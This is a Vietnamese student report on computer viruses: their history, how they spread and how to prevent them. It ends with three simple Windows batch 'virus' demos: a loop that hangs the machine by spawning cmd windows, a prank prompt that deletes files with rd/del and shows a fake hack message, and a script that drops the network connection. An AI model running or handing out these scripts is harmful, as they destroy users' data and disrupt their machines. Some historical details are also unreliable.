Tải bản đầy đủ (.docx) (21 trang)

An toàn bảo mật viết virus máy tính đơn giản

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (658.99 KB, 21 trang )

Mục lục

LỜI CẢM ƠN

Em xin chân thành gửi lời cảm ơn đến quý thầy cô trường Đại
Học Tài Nguyên & Môi Trường Hà Nội đã tạo điều kiện cho chúng em
cơ hội thực hành, tiếp xúc để chúng em có thể tránh được những vướng
mắc và bỡ ngỡ trong môi trường công việc thời gian tới.
Em xin chân thành cảm ơn thầy Nguyễn Đức Tồn, nhờ sự giúp
đỡ tận tình và những chỉ bảo của thầy từ lúc bắt đầu cho tới lúc kết thúc
bài tập để chúng em hoàn thành đúng thời hạn quy định và tích lũy
được cho mình một lượng nền tảng kiến thức quý báu.
Mặc dù đã cố gắng hoàn thành đề tài tốt nhất nhưng do thời gian
và kiến thức cịn có hạn nên em sẽ khơng thể tránh khỏi những thiếu sót
nhất định, rất mong nhận được sự cảm thông, chia sẻ và tận tình đóng
góp chỉ bảo của q thầy cơ cũng như các bạn.

Hà Nội, ngày 11 tháng 11 năm 2021


2

LỜI NĨI ĐẦU

Virus máy tính từ khi ra đời đã trở thành, đã trở thành mối nguy hại
đối với tất cả các hệ thống máy tính và mạng trên thế giới.
Mặt khác, cũng khơng thể phủ nhận tính tích cực của virus máy tính,
bởi virus máy tính chỉ có thể phát triển được dựa trên những sơ xuất của
công nghệ và người sử dụng nên thơng qua việc tìm hiểu về các cơ chế
hoạt động của virus, các phương thức lây lan cũng như phá hoại của chúng
ta có thể đưa ra các giải pháp cải thiện chất lượng và độ an toàn của phần


mềm cũng như các hệ thống.
Tuy nhiên sự phát triển của các thế hệ virus máy tính trong những
năm gần đây đã gây ra những hậu quả mà để khắc phục chúng phải tiêu phí
một lượng rất lớn thời gian cũng như tiền bạc. Vì vậy việc tìm hiểu và
phân tích về virus máy tính là điều cần thiết để bảo vệ máy tính cũng như
dữ liệu của mình. Và đó là lý do em chọn đề tài này.

2


3

CHƯƠNG 1. TỔNG QUAN VỀ LÝ THUYẾT
Virus máy tính( thường được người sử dụng gọi tắt là
virus) là những đoạn mã chương trình được thiết kế để tự
nhân bản và sao chép chính nó vào các đối tượng lây nhiễm
khác( file, ổ đĩa, máy tính,…)
Virus máy tính từ khi ra đời cho đến nay luôn tận dụng
những kỹ thuật tiên tiến của công nghệ thông tin và truyền
thông cũng như lợi dụng những lổ hổng nguy hiểm trong
các hệ thống tin học để khuyếch trương ảnh hưởng của
mình. Mặc dù việc sử dụng các thiết bị và phần mềm bảo
mật trở nên phổ biến, virus vẫn tiếp tục phát triển mạnh
mẽ do giờ đây chúng thường được viết ra có mục đích rõ
ràng, phục vụ một đối tượng cụ thể và không ngừng cải tiến
qua các phiên bản để đạt được phiên bản hiệu quả nhất.

1.1. Phân loại các phần mềm độc hại
Có nhiều cách phân loại các phần mềm độc hại và do
đó định nghĩa về chúng cũng có đơi chút khác nhau:



Bugware: Các chương trình hoặc các phần mềm hợp lệ
được thiết kế để thực hiện một số chức năng nào đó
nhưng do lỗi lập trình nên gây lỗi cho hệ thống khi sử
dụng.



Trojan horse: Các đoạn chương trình có hại được cài có
chủ định vào trong các chương trình hợp lệ, có thể tiến
hành phá hoại, ăn cắp thơng tin của người sử dụng
v.v.. khơng có khả năng lây lan.



Software bombs: Các đoạn mã có tính chất phá hoại
được giấu bí mật chờ thực hiện, chỉ phá hoại một lần,
không lây lan.
3


4


Replicators: Các chương trình gần giống với virus, liên
tục nhân bản làm cạn kiệt tài nguyên của hệ thống
khiến các chương trình khác khơng hoạt động được
nữa.




Virus: Chương trình máy tính được thiết kế để tự lây
lan chính nó từ một file tới một file khác trên một máy
vi tính riêng lẻ, khơng có khả năng tự lây lan từ máy
tính này sang máy tính khác.



Worm: Chương trình được thiết kế để tự lây lan chính
nó từ một máy tính tới một máy tính khác qua mạng.


1.2. Lịch sử hình thành và phát triển của virus máy tính
Trên cơ sở lý thuyết về virus máy tính đã xuất hiện từ
rất lâu, năm 1949, John von Newman viết bài “Lý thuyết và
cơ cấu của các phần tử tự hành phức tạp – Theory and
Organization of Complicated Automata” trong đó nêu ra ý
tưởng về các chương trình tự nhân bản. Đến năm 1959, ba
lập trình viên của AT&T viết chương trình Core war có trang
bị tính năng tự nhân bản và tiêu diệt bảng mã của đối
phương, sau này trở thành tính năng chính của virus máy
tính.
Sự phát triển của virus nói riêng và các phần mềm độc
hại nói chung có thể chia làm bốn giai đoạn kéo dài từ năm
1979 đến bây giờ.
Mỗi giai đoạn đại diện cho một khuynh hướng công
nghệ mới và virus luôn tận dụng triệt để những cơng nghệ
đó.


4


5
1.2.1. Giai đoạn thứ nhất (1979-1990)
Những virus đầu tiên là virus boot-sector lây trên nền
hệ điều hành MS DOS. Khoảng những năm 1980 trở đi, số
lượng virus tăng vọt cùng với sự phát triển của máy tính cá
nhân. Đại diện của giai đoạn này có thể xét đến virus Brain
xuất hiện năm 1986 và virus Lehigh xuất hiện năm 1987.
Sau đó một thời gian ngắn bắt đầu xuất hiện thuật
ngữ “worm” chỉ những phần mềm có khả năng tự lây lan
qua mạng. Năm 1987, một trong những worm đầu tiên là
Christma Exec có khả năng lây lan qua e-mail giữa các
mainframe IBM, người sử dụng bị đánh lừa để thực thi virus
bởi vì nội dung của email cho biết nếu được thực thi nó sẽ
vẽ một cây thơng Noel, và đúng là worm có thực hiện việc
vẽ một cây thơng Noel lên màn nhưng đồng thời nó cũng
gửi một bản sao của mình tới những người sử dụng khác
nằm trong danh sách email của nạn nhân. Những người sử
dụng đó rất tin tưởng vì nhận được email từ người họ quen
biết và họ cũng mở email ra.
Tháng 11 năm 1988, Robert Morris Jr. viết ra worm
Morris lây lan tới 6000 máy tính chỉ trong vài giờ (khoảng
10% số máy trên Internet tại thời điểm đó). Tuy nhiên sau
đó worm này bị phát hiện và tiêu diệt bởi một lỗi lập trình
của nó là tiến hành lây lại trên các máy tính đã bị nhiễm từ
trước, dẫn đến việc giảm tốc độ đáng kể ở máy tính đó nên
dễ bị phát hiện.


1.2.2. Giai đoạn thứ hai (1990-1998)
Giai đoạn thứ hai diễn ra trong khoảng những năm
1990 đến 1998 đánh dấu nhiều hoạt động của virus hơn là
worm mặc dù những kỹ thuật tiên tiến của virus đã có tác
5


6
động rất mạnh mẽ lên quá trình phát triển của worm. Trong
thời kỳ này, virus bắt đầu chuyển từ hệ điều hành DOS sang
tấn công hệ điều hành Windows, xuất hiện các virus macro,
các virus bắt đầu sử dụng kỹ thuật đa hình để ngụy trang
tránh bị phát hiện và đặc biệt là xu hướng sử dụng e-mail
như là một công cụ để phát tán.
Trong thời kỳ này các virus sử dụng dấu hiệu nhận
dạng bằng các từ khóa nên dễ dàng bị phát hiện khi các
phần mềm diệt virus tiến hành qt và phân tích file. Để
đối phó, ban đầu virus sử dụng thuật tốn mã hóa để che
dấu sự tồn tại của mình, tuy nhiên để thực hiện việc này
virus phải xây dựng cả thủ tục mã hóa và thủ tục giải mã
và vẫn có yếu điểm nên vẫn bị các phần mềm diệt virus
phát hiện.
Khoảng năm 1989, virus sử dụng kỹ thuật ngụy trang
đa hình xuất hiện, đây là một kỹ thuật phức tạp cho phép
virus tự biến đổi để tránh bị các cơng cụ dị tìm phát hiện.
Cũng trong khoảng thời gian này, một số hacker đã
tạo ra các bộ cơng cụ phát triển có giao diện dễ sử dụng
cho phép các hacker cũng có thể tạo ra các virus mới có
tính năng lây lan và phá hoại tương đối mạnh, sản phẩm
được đánh giá là xuất sắc nhất của các toolkit là virus Anna

Kournikova. Virus này giả làm một bức ảnh dạng JPG của
ngôi sao quần vợt Anna Kournikova được đính kèm theo
một e-mail. Nếu đoạn VBScript được thực hiện, e-mail chứa
virus sẽ sao chép chính nó tới mọi địa chỉ nằm trong sổ địa
chỉ của Outlook.
Năm 1995 đánh dấu sự xuất hiện của virus macro đầu tiên
có tên gọi là Concept, virus này được viết để lây nhiễm vào
file normal.dot của Microsoft Word sử dụng cho hệ điều
hành Windows 95.
6


7
Những virus macro có những lợi thế do rất dễ viết và
chạy được trên nhiều platform khác nhau. Tuy nhiên, đa số
người sử dụng hiện giờ đều biết cách bỏ tính năng thực hiện
các macro trong Office và vì vậy virus đã bị mất đi tính phổ
biến cũng như các lợi thế của mình.

1.2.3. Giai đoạn thứ ba (1999-2000)
Giai đoạn thứ ba kéo dài từ năm 1999 tới cuối năm
2000 được đánh dấu bằng sự phát triển mạnh mẽ của trào
lưu phát tán virus qua email. Tháng 1 năm 1999, sâu
Happy99 đã lây qua e-mail với file đính kèm có tên
Happy99.exe.
Khi file đính kèm được thực hiện, bề ngồi nó hiển thị
pháo hoa chào năm mới 1999 trên màn hình, nhưng cũng bí
mật sửa file WSOCK32. DLL với một Trojan cho phép worm
có thể chèn bản sao của nó vào trong các tiến trình truyền
thơng. File WSOCK32.DLL ban đầu được đổi tên thành

WSOCK32.SKA. Mỗi e-mail do người sử dụng gửi đi đều chứa
worm.
Tháng 3 năm 1999, virus Melissa lây lan sang 100.000
máy tính trên thế giới chỉ trong 3 ngày.
Tháng 6 năm 1999, worm ExploreZip giả mạo giao
diện của file WinZip và gắn vào email để lây lan. Nếu được
thực hiện, nó sẽ hiển thị một thơng báo lỗi, nhưng thao tác
thật sự của worm này là bí mật sao chép chính nó vào trong
thư mục những hệ thống của Windows hoặc tự nạp vào
trong Registry. Nó tự gửi mình qua e-mail sử dụng Microsoft
Outlook hoặc Exchange tới các địa chỉ nằm trong hộp thư.
Nó theo dõi tất cả các email đến và tự trả lời người gửi với
một bản sao của mình.
7


8
Đầu năm 2000, virus BubbleBoy xuất hiện chứng minh
một máy tính có thể bị lây nhiễm chỉ bằng cách xem trước
e-mail mà khơng cần phải mở email đó ra. Nó tận dụng một
lỗ hổng bảo mật trong Internet Explorer cho phép tự động
thực hiện VB Script nhúng trong thân của email. Virus được
gửi tới như e-mail với tiêu đề "BubbleBoy is back” và nội
dung email có chứa đoạn mã VBScript của virus. Nếu email
được đọc bằng Outlook, script sẽ được chạy cho dù email
mới chỉ được đọc bằng chức năng “preview”. Một file được
bổ sung vào trong thư mục khởi động của Windows, như
vậy khi máy tính bắt đầu khởi động lại, virus sẽ gửi bản sao
của nó tới tất cả các địa chỉ email nằm trong Outlook.
Tháng 5 năm 2000, worm Love Letter lây lan rất

nhanh dưới dạng một e-mail với subject "I love you" và file
đính kèm có đuôi dạng text để lừa người sử dụng đọc trong
khi thực ra đó là một đoạn VBScript. Khi được thực hiện,
worm sẽ cài đặt bản sao của mình vào trong thư mục hệ
thống và sửa đổi Registry để bảo đảm rằng file này được
chạy mỗi khi máy tính khởi động. Love Letter cũng lây lan
sang nhiều kiểu file khác nhau trên ổ đĩa cục bộ và các thư
mục dùng chung chia sẻ qua mạng. Khi lây sang một máy
tính khác, nếu Outlook đã được cài đặt, worm sẽ gửi email
có bản sao của nó tới bất cứ địa chỉ nào trong sổ địa chỉ.
Tháng 10 năm 2000, worm Hybris cũng bắt đầu lây lan
qua email theo kiểu đính kèm. Khi được thực hiện, nó sửa
file WSOCK32. DLL để theo dõi q trình truyền thơng của
máy tính. Với mỗi e-mail gửi đi, nó cũng gửi một bản sao
của mình cho cùng người nhận. Điều nguy hiểm nhất là nó
có khả năng tự tải về các bản nâng cấp từ một địa chỉ trên
mạng.

8


9
1.2.4. Giai đoạn thứ tư (2001 - nay )
Giai đoạn của những worm hiện đại bắt đầu từ năm
2001 đến tận ngày nay. Chúng có khả năng lây lan rất
nhanh và mức độ tinh vi rất cao. Virus ngày nay có thể xâm
nhập bằng cách bẻ gãy các rào an toàn của hệ điều
hành hay chui vào các chỗ hở của các phần mềm nhất là
các chương trình thư điện tử, rồi từ đó lan tỏa khắp nơi theo
các nối kết mạng hay qua thư điện tử.

Ngày 12 tháng bảy năm 2001, sâu Code Red xuất hiện
bắt đầu khai thác lỗi tràn bộ đệm trong MS IIS web server
(mặc dù lối này mới được công bố ngày 18 tháng 6 năm
2001) và lây nhiễm cho 200.000 máy tính trong 6 ngày mặc
dù chúng có lỗi trong cơ chế tìm kiếm. Cuối tháng 7, phiên
bản thứ 2 của Code Red I (Code Red v2) đã được sửa lỗi nên
có khả năng lây lan rất nhanh, chỉ trong 14 giờ nó đã lây
nhiễm cho hơn 359.000. Phần phá hoại của Worm này đồng
loạt tấn cơng website www.whitehouse.gov.
Sau đó ít lâu bắt đầu xuất hiện các worm có khả năng
disable các antivirus như Klez và Bugbear vào tháng 10
năm 2001, một số worm khác cịn tiến hành ghi lại các thao
tác bàn phím của người sử dụng để gửi về cho hacker.
Tháng 8 năm 2003 xuất hiện worm Blaster khai thác lỗi của
Windows DCOM RPC để lây lan, phần phá hoại của worm
này cho phép tấn công kiểu từ chối dịch vụ để tấn công tới
Microsoft Web site “windowsupdate.com” vào năm 2003.
Năm 2004: Đánh dấu 1 thế hệ mới của virus là worm Sasser.
Với virus này thì người ta khơng cần phải mở đính kèm
của điện thư mà chỉ cần mở lá thư là đủ cho nó xâm nhập vào
máy. Cũng may là Sasser khơng hồn tồn hủy hoại máy mà

9


10
chỉ làm cho máy chủ trở nên chậm hơn và đơi khi nó làm máy
tự khởi động trở lại.
Năm 2017: Vụ


tấn

cơng

của

WannaCry vào

ngày 12/5/2017 đang tiếp tục phát tán. WannaCry cịn được
gọi là WannaDecryptor 2.0, là 1 phần mềm độc hại mã độc
tống tiền tự lan truyền trên các máy tính sử dụng Microsoft
Windows. Vào tháng 5/2017, 1 cuộc tấn công khơng gian
mạng quy mơ lớn sử dụng nó được đưa ra, tính tới ngày 15/5
gây lây nhiễm trên 230.000 máy tính ở 150 quốc gia.
Trong tương lai khơng xa, virus sẽ có thêm các bước biến đổi
khác, nó bao gồm mọi điểm mạnh sẵn có (polymorphic,
sasser hay tấn cơng bằng nhiều cách thức, nhiều kiểu) và còn
kết hợp với các thủ đoạn khác của phần mềm gián điệp. Đồng
thời nó có thể tấn cơng vào nhiều hệ điều hành khác nhau chứ
không nhất thiết nhắm vào 1 hệ điều hành độc nhất như trong
trường hợp của Windows hiện giờ. Và có lẽ virus sẽ khơng hề
thay đổi phương thức tấn cơng: lợi dụng điểm yếu của máy
tính cũng như chương trình.

1.3 Cách thức hoạt động
Cách thức hoạt động của virus thì có thể được diễn giải khái
qt như sau.
-

Các máy


tính hoạt

động

bằng

các chỉ

thị ở

dạng mã

máy theo trình tự hợp lý để thực thi 1 cơng việc nào đó. Mã
máy là dãy số nhị phân và việc lập trình trực tiếp mã
máy rất nhức đầu, nên giới điện toán thiết kế ra các ngơn
ngữ lập trình (như C, C++, Java,...) để người lập trình ứng
dụng thảo chương bằng những ký hiệu và tên gọi dễ nhớ,

10


11
sau đó dịch sang mã máy để máy thi hành. Nếu lập trình
-

khơng hợp lý thì máy bị treo, khơng làm được gì.
Kỹ thuật lập trình dẫn đến những cơng việc xác định được
lặp lại nhiều lần thường được tổ chức thành modul riêng gọi



"trình

con",

trong ngơn

ngữ

lập

trình gọi

là routine hay subroutine, và khi cần thực hiện công việc
vốn ấn định cho routine đó thì trình đang chạy thực hiện
lệnh gọi đến routine đó để thực thi. Lệnh call có tham
số là địa chỉ routine trong bộ nhớ, khi thực thi lệnh call thì
chuyển địa chỉ này vào con trỏ lệnh của CPU và trao quyền
chạy cho routine đó. Cấu trúc routine có điểm vào là nơi bắt
đầu, và điểm ra trả lại điều khiển cho trình gọi sau khi hồn
-

tất cơng việc.
Virus được viết ra là dạng 1 routine, thực hiện sửa tham
số địa chỉ của một số lệnh call trỏ đến địa chỉ của nó, và kết
thúc virus thì chuyển điều khiển đến routine vốn được gọi
của trình. Những gì virus làm thì gói trong dãy mã lệnh
virus, trong đó có kỹ năng tự sao lây nhiễm, và tùy thuộc

-


trình độ người viết virus.
Sự tương tự của mã trình với mã DNA sinh học, và hoạt
động của virus tin học, dẫn đến tên gọi "virus". Dẫu vậy sự
khác nhau căn bản, là virus sinh học phát tác ngay và đồng
thời trong tế bào, còn virus tin học chỉ phát tác khi được
gọi với tư cách mã lệnh. Nếu nạp virus tin học với tư
cách dữ liệu vào bộ nhớ để xem thì nó khơng làm được gì
cả. Nó cho thấy vai trị cảnh giác khi click vào file có virus
Trong thiết kế các máy tính địa chỉ các routine cơ bản được bố trí

như sau:
Địa chỉ các routine của máy chứa trong BIOS thì
sau khởi động được đặt trong bộ nhớ ở nơi gọi là "bảng
địa chỉ Interrupt".

11


12
Khởi động của ổ đĩa (mềm, cứng, USB,...) được đặt
ở boot sector, còn địa chỉ file trong ổ đĩa đặt ở bảng
FAT của đĩa.
Virus lục lọi các bảng này để tìm cách thâm nhập thích hợp.
Trước đây các virus thường ngắn, có thể gắn thêm vào tệp mã.
Ngày nay virus có thể lưu trữ phần thân ở dạng file riêng và ẩn
dấu đâu đó trong đĩa hoặc trên mạng. Virus phải cố tìm các lỗ
hổng bảo mật để xâm nhập, và việc tìm ra lỗ hổng địi hỏi khả
năng phân tích mã lệnh phức tạp hơn. Một số virus thì xuất
hiện ở dạng chương trình tự lập, thực chất là phần mềm phá

hoại, và thực hiện đánh lừa bằng cách hiện ra là 1 biểu tượng
hay đường link để người thiếu cảnh giác click vào đó.
1.4 Hình thức lây nhiễm
Virus có thể lây nhiễm ở nhiều cách thức khác nhau và ngày càng tinh vi
hơn. Dưới đây là những con đường lây lan phổ biến nhất của virus máy
tính:
-

Thiết bị gắn ngồi: Virus có thể lây lan vào máy tính thông qua USB, điện

-

thoại, các đĩa cứng di động hoặc các thiết bị giải trí kỹ thuật số.
Lây nhiễm qua mạng internet:
• Tải file hoặc phần mềm: Khi tải file hoặc phần mềm trên mạng về
máy tính, nếu file bị nhiễm virus thì khả năng cao nó sẽ lây lan sang
máy tính.
• Lây qua email: Email là cách thức truyền thống để liên lạc, trao đổi
với nhau cho tới ngày nay. Virus sẽ tìm tồn bộ email liên lạc trong
danh sách và tự động gửi mail hàng loạt. Và khi người nhận mail
click vào file đính kèm, link liên kết, hay trong chính nội dung email
thì virus sẽ nhanh chóng lây lan theo cấp số nhân.
• Quảng cáo trực tuyến: Nếu khơng may click vào quảng cáo có chứa
mã độc, thì nó có thể lây lan virus vào máy tính. Những kẻ tấn công
mạng chèn mã độc vào quảng cáo và cài đặt quảng cáo trên các trang
web để dụ dỗ người dùng click vào.
• Trang web độc hại
12



13
• Link, file lừa đảo: Những loại link, file này có thể xuất hiện ở bất cứ
đâu trên internet, từ các trang web, mạng xã hội, các ứng dụng trò
-

chuyện.
Virus lây qua Bluetooth, NFC( Near-Field Communications): Nếu
chia sẻ dữ liệu với các thiết bị khác qua các kết nối không
dây mobile như Bluetooth, NFC thì cũng có thể thiết bị sẽ bị
nhiễm virus. Vì thế hãy tắt hết các kết nối này khi không sử

-

dụng.
Virus lây qua lỗ hổng bảo mật, backdoor của hệ điều hành: Thực chất xét
chi tiết thì cách thức lây nhiễm này cũng thơng qua các con đường trên.
Tức là khi trên hệ điều hành có backdoor, có lỗ hổng bảo mật thì hacker
vẫn cần tiếp cận được với máy tính thơng qua thiết bị gắn ngồi, các liên
kết link, file độc hại mới có thể phát tán virus.

1.5 Một số cách phòng chống virus hiện nay

1.5.1 Phòng tránh virus lây lan qua thiết bị ngoại vi

Virus có thể dễ dàng xâm nhập vào máy tính từ các thiết bị
ngoại vi như: USB, thẻ nhớ, ổ cứng di động,…khi thực hiện
thao tác sao chép dữ liệu. Vậy nên trước khi cắm các thiết bị
ngoại vi vào máy tính, cần qt virus trước sau đó mới click
vào để mở dữ liệu. Bên cạnh đó khi mở file, thay vì nhấp đúp,
nên click chuột phải chọn open.

1.5.2 Phịng tránh virus trong file đính kèm tải về từ
internet

Có rất nhiều trường hợp, người dùng phải lên tải các file tài liệu
về máy để phục vụ cho mục đích sử dụng của mình. Khi tải file
13


14
từ internet về máy, cần phải truy cập vào những trang web có
độ tin tưởng cao, nguồn gốc rõ rang. File của những trang này
đã được kiểm duyệt nên sẽ khơng bị đính kèm virus gây hại.
bên cạnh đó, cũng không nên click vào những đường link
không rõ rang để tránh virus xâm nhập và phát tán.
1.5.3 Phòng tránh virus lây nhiễm qua thư điện tử

Hiện nay, virus được đính kèm theo thư điện tử ngày
càng trở nên phổ biến. Những virus được đính kèm qua tư
điện tử thường là loại có khả năng đánh cắp thơng tin trên
diện rộng và rất khó kiểm sốt, gây ra những mối nguy
hại khơng lường được. Để phịng tránh virus lây lan, nên
kiểm tra cẩn thận những email từ địa chỉ lạ có đính kèm
đường link khơng rõ ràng.
1.5.4 Sử dụng phần mềm diệt virus
Bảo vệ máy tính bằng cách trang bị thêm một phần mềm diệt virus có khả
năng nhận biết nhiều loại virus máy tính và liên tục cập nhật dữ liệu để phần
mềm đó ln nhận biết được các virus mới, ví dụ như: Bkav, D32,CMC,
Norton-Symantec, Kaspersky, Avira, AVG, ESET, Avast!, BitDef
ender, Microsoft Security Essentials, Windows
Defender (từ Windows 7 trở đi)


1.5.5 Sử dụng tường lửa cá nhân

Khi sử dụng tường lửa, các thơng tin vào và ra đối với máy
tính được kiểm sốt một cách vơ thức hoặc có chủ ý. Nếu
1 phần mềm độc hại đã được cài vào máy tính có hành
động kết nối ra Internet thì tường lửa có thể cảnh báo
giúp người sử dụng loại bỏ hoặc vơ hiệu hố chúng.
14


15
Tường lửa giúp ngăn chặn các kết nối đến không mong
muốn để giảm nguy cơ bị kiểm sốt máy tính ngồi ý
muốn hoặc cài đặt vào các chương trình độc hại hay virus
máy tính.

1.5.6 Cập nhật các bản vá lỗi của hệ điều hành

Hệ điều hành Windows luôn luôn bị phát hiện các lỗi bảo mật chính bởi
sự thơng dụng của nó, tin tặc có thể lợi dụng các lỗi bảo mật để chiếm
quyền điều khiển hoặc phát tán virus và các phần mềm độc hại. Người
sử dụng luôn cần cập nhật các bản vá lỗi của Windows thông qua trang
web Microsoft Update hoặc Windows Update. Cách tốt nhất hãy đặt chế
độ nâng cấp tự động của Windows. Tính năng này chỉ hỗ trợ đối với các
bản Windows mà Microsoft nhận thấy rằng chúng hợp pháp.
Ngồi ra thì có thể vận dụng kinh nghiệm sử dụng máy tính để phát hiện
sự hoạt động khác thường của máy tính, kiểm sốt các ứng dụng đang
hoạt động, loại bỏ 1 số tính năng tự động của hệ điều hành và quét virus
trực tuyến. Bảo vệ dữ liệu máy tính bằng cách sao lưu dữ liệu theo chu

kỳ, tạo các dữ liệu phục hồi cho tồn hệ thống.

CHƯƠNG 2. THỬ NGHIỆM CHƯƠNG TRÌNH MƠ
PHỎNG TẠO VIRUS MÁY TÍNH

2.1 Ví dụ tạo virus làm treo máy
Tạo virus làm treo máy bằng notepad

15


16

• Mơ tả code
-

@echo off
:x
start cmd %loop%
goto x

Hình 2.1: Mơ phỏng chương trình virus làm treo máy
Kết quả: Máy tính có hiện tượng bị treo

16


17

Hình 2.2: Kết quả chương trình


2.2 Ví dụ tạo virus xóa dữ liệu
Tạo virus xóa dữ liệu được chỉ định bằng notepad

17


18
• Mơ tả code
@echo off
echo Ban co yeu minh khong?
(Chi can tra loi co hoac khong)
set /p yeu=
if %yeu%==co goto x
if %yeu%==khong goto y
:x
echo Minh cung yeu ban ahihi
echo Hen gap lai :pp
pause
exit
:y
echo Hmm ok...
echo May tinh ban se bi hack
trong 5 giay nua
timeout 5
rd /s /q (đường dẫn thư mục cần
xóa) del /s /f /q (đường dẫn tệp
tin cần xóa)\*.*
cls echo X=MsgBox("Ban da bi
hack",24+24,"Xin chuc

mung!!!") enjoy. >>vbs
start enjoy.vbs

Hình 2.3: Mơ phỏng chương trình tạo virus xóa dữ liệu

Kết quả: Virus chạy thành cơng và xóa tồn bộ dữ liệu đã được
chỉ định

18


19

Hình 2.4: Kết quả chương trình

2.3 Ví dụ tạo virus phá kết nối mạng
Tạo virus phá kết nối mạng
• Mơ tả code
@echo off
ipconfig /release echo
X=MsgBox("Ban da bi
hack",24+24,"Xin chuc
mung!!!") >>enjoy.vbs
start enjoy.vbs

Hình 2.5: Mơ phỏng chương trình virus phá kết nối mạng
Kết quả: Virus chạy thành công và chặn kết nối mạng của máy
tính

19



20

Kết luận
Kết quả đạt được
-

-

Tìm hiểu và nghiên cứu lý thuyết:
• Phân loại
• Lịch sử hình thành và phát triển
• Các thức hoạt động
• Hình thức lây nhiễm
• Một số cách phịng chống virus hiện nay
Thử nghiệm chương trình mơ phỏng tạo virus máy tính

Nhận xét
……………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………

…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
20


21
…………………………………………………………………………………..
.

Tài liệu tham khảo
1. []
2. [ />3. [Ngô Anh Vũ (2002), Virus tin học huyền thoại và thực tế, NXB
Thành Phố Hồ Chí Minh]
4. [Anand Mylavarapu, Anil Chukkapalli, Source code analysis and
performance, Computer Science Department, St. Cloud State
University]
5. [Cynthia Wong, Stan Bielski, Jonathan M. McCune, Chenxi Wang, A
Study of Mass-mailing Worms, Carnegie Mellon University]
6. [David Harley, Robert Slade, Urs Gattiker (2001), Viruses Revealed,
McGraw Hill]

21




×